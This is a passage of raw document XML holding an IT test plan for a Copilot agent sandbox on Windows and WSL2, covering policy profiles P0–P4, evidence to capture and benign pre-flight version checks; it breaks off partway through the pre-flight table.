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officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core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>
  <w:body>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copilot Local Sandbox – Test &amp; Validation Plan (CLI · App · VS Code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Oct 22, 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">@SK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. How to use this plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">This plan lists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">138 test cases</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> across 8 areas plus 9 pre-flight checks. Each one says what to do and what to expect with the sandbox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (per client) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OFF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Run it on a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">canary device per ring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before Intune assigns the next group.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Clients in scope</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Copilot CLI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≥ 1.0.93, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Copilot app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≥ 1.1.26, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">VS Code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≥ 1.141.0 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Copilot harness / Agent Host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sessions only).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Two hosts per client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — run every case on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">native Windows 11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and again inside </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">WSL2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (VS Code via Remote-WSL; CLI launched inside the distro). Outcomes differ, mainly on network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">"OFF" means</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the sandbox is not active for that session — no managed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sandbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key, user setting off, or session opt-out. The agent's commands then run with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">your full Windows/Linux account rights</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Approvals are a separate layer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — keep the permission level on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">manual approvals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> during testing so you see each command. VS Code sandboxing still applies under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Allow all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Use a throwaway test repo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with planted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fake</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> secrets (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\SbxTest\secrets\fake-token.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%USERPROFILE%\.ssh\id_fake</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Never test with real credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Test policy profiles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (apply one at a time; record which profile each run used)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1935"/>
        <w:gridCol w:w="2505"/>
        <w:gridCol w:w="4920"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Key values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">P0 – OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Nothing managed; user setting off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> off</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">P1 – Default ON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">User setting only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, all other defaults</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">P2 – Observe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Intune (registry)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">learningMode: "allow"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Ring 0) or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">"deny"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Ring 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">P3 – Balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Intune + WSL file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">P2 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">failIfUnavailable: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">learningMode: "deny"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowLocalNetwork: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowedHosts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> list, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">deniedPaths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">P4 – Strict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Intune</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">P3 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowDevToolAccess: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">auth.gh: false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence to capture for every case</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/sandbox status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/sandbox policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CLI, VS Code); a screenshot of the app's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sandbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> project settings plus the session banner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VS Code: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Developer: Policy Diagnostics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> export.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The exact command, its output or error text, and any bypass prompt wording (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">"sandbox relaxed"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">"sandbox bypassed"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Windows CLI).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pass / fail against the expected outcome, and a ServiceNow ticket for any deviation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Legend in tables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ✅ allowed / works · ⛔ blocked · ⚠️ works with caveat · 🔍 verify — docs don't state this outcome clearly. "OFF" column applies to all three clients unless noted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Pre-flight checks (before any ON/OFF test)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">If any pre-flight fails, stop — every later result on that device is invalid.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="868"/>
        <w:gridCol w:w="1266"/>
        <w:gridCol w:w="2280"/>
        <w:gridCol w:w="1657"/>
        <w:gridCol w:w="1279"/>
        <w:gridCol w:w="2010"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Copilot CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Windows build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">winver</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / Intune compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">25H2 ≥ 26200.9550 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">KB5124010</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) or 26H1 ≥ 28000.3086 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">KB5124006</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">), BaseContainer support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same (Windows support marked </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Experimental</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">WSL2 packages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bwrap --version</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">which slirp4netns</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">unshare --help | grep map-current-user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">iptables --version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">bwrap ≥ 0.5.0 + slirp4netns (+ util-linux ≥ 2.35, iptables for outbound)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a (app sessions are local Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">bwrap ≥ 0.5.0, slirp4netns, util-linux ≥ 2.35, iptables tools; glibc distro; WSL1 ⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Client version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">copilot --version</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> · app About · VS Code Help → About</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">≥ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">1.0.93</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">≥ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">1.1.26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">≥ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">1.141.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Below-minimum client</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (negative)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Install one version older on a test VM, deliver managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
